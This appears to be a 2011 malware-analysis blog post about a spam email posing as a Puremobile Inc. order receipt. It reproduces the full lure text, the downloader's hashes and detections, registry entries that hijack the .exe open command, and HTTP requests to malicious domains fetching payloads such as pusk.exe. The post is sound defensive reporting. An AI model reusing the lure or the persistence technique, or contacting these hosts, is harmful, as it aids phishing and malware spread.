Tag Archives: Payment document.exe

Malware: Your Order No 218538 – Puremobile Inc.

Suspicious email spreading malware:

Received: from 18714128077.user.veloxzone.com.br (unknown [187.14.128.77]) 
Received: from [132.75.231.74] (helo=qnmekzdssguat.bacphgvlbnez.ua)
From: "Puremobile Inc." <h5923a@ms2.hinet.net>
Subject: Your Order No 218538 - Puremobile Inc.

Message:

Thank you for ordering from Puremobile Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 372662.
 
You will need this in all correspondence.
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 045.00 USD and "Puremobile Inc." will
appear next to the charge on your statement.
Your purchase information appears below in the file.

Attached there is a file with ZIP extension:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-zip
File size: 7627 bytes
MD5 hash: d85180f7a74e04c9b9ef6f9bd437194d
SHA1 hash: 79763a8766773bc08f7dd309db2488f46d3f5438
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 01/05/2011 10.0.0.1190 FakeAlert
Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The extracted file is an executable file:

Report date: 2011-05-01 23:21:48 (GMT 1)
File name: payment-document-exe
File size: 18432 bytes
MD5 hash: 694a38aa76e06cebe4048260b8f0e4fa
SHA1 hash: 0e698c044e77e11e2c494ad0b2dc002f6d73dabe
Detection rate: 2 on 6 (50%)
Status: INFECTED

Avira AntiVir 01/05/2011 7.11.7.12 TR/Dldr.FraudLoad.zemh
Emsisoft 01/05/2011 5.1.0.2 Trojan-Downloader.Win32.Chepvil!IK

The malware creates following files:

%AppData%\kdv.exe (BE39D725BDA9A76EAB2E0F1B3FAD8FA3)

Registry entries added:

HKCU\Software\Classes\.exe\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"
 
HKCU\Software\Classes\exefile\shell\open\command:
(Default) = ""%AppData%\kdv.exe" -a "%1" %*"

Network traffic:

GET /0014000126 HTTP/1.1
Host: hahecekis. com
 
GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/hahecekis.net
http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net